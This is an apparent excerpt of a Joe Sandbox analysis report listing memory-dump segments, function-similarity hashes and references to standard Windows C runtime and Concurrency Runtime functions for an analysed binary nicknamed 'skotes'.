                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _wcsrchr
                                                                                                                                                                                                                                                  • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                                  • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                                  • Opcode ID: 696f2c69c972a01a3dde622d56feb3f2fb21b4c62e3375d9bd4eda1631e8fd18
                                                                                                                                                                                                                                                  • Instruction ID: 376feebb1bc5f81e196bf6d96827c31bb7911eeab115e189a935bace5ca7bd22
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 696f2c69c972a01a3dde622d56feb3f2fb21b4c62e3375d9bd4eda1631e8fd18
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD012F27708612256A345019AD02F6713889BE3BB8B26401FFC54F73C1DF8CDC42A2EC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0048FB06
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                                  • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 348560076-465693683
                                                                                                                                                                                                                                                  • Opcode ID: 632fe1dbccc23f91fce8696df6c87d31a0c162e9a0ab891087c740ec281fcd91
                                                                                                                                                                                                                                                  • Instruction ID: c4bb18f288e5fb83ff90974f4fad40a5b5308c266e86624482432e562d371803
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 632fe1dbccc23f91fce8696df6c87d31a0c162e9a0ab891087c740ec281fcd91
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E201B9296523112D9B14B7BA5C8AFAF26DCD942714730183FB905E6293FDADD804437C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • StructuredWorkStealingQueue.LIBCMT ref: 004A20B7
                                                                                                                                                                                                                                                    • Part of subcall function 0049CAF3: Mailbox.LIBCMT ref: 0049CB2D
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A20C8
                                                                                                                                                                                                                                                  • StructuredWorkStealingQueue.LIBCMT ref: 004A20FE
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A210F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                                                                                                  • String ID: e
                                                                                                                                                                                                                                                  • API String ID: 1411586358-4024072794
                                                                                                                                                                                                                                                  • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                                  • Instruction ID: d682d26038fd0b660f8e1ca0a0740bd2f027bc404254aad9270c6cdb5a3bd6ab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED11C131104144ABDB01DE6DCA816AB77A4AF27328B14806BFD068F202DBB9D901EB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • WakeAllConditionVariable, xrefs: 0048D069
                                                                                                                                                                                                                                                  • SleepConditionVariableCS, xrefs: 0048D05D
                                                                                                                                                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0048D03B
                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 0048D04C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___scrt_fastfail
                                                                                                                                                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 2964418898-3242537097
                                                                                                                                                                                                                                                  • Opcode ID: a25aefea2423b1c6343bf9393392758c5e872dca477448f237da754cb20222fc
                                                                                                                                                                                                                                                  • Instruction ID: a16951e97c6ffdaa623b45dcc9633bc3ab3451268bb934b1a2d108b9dcecdf80
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a25aefea2423b1c6343bf9393392758c5e872dca477448f237da754cb20222fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB018425BC37316A9630367A5D0DFAF13C98B43B44F65182BAC09E22D0DDA8C801966D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 0049E91E
                                                                                                                                                                                                                                                  • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0049E926
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049E950
                                                                                                                                                                                                                                                  • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0049E959
                                                                                                                                                                                                                                                  • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0049E9DC
                                                                                                                                                                                                                                                  Memory Dump Source
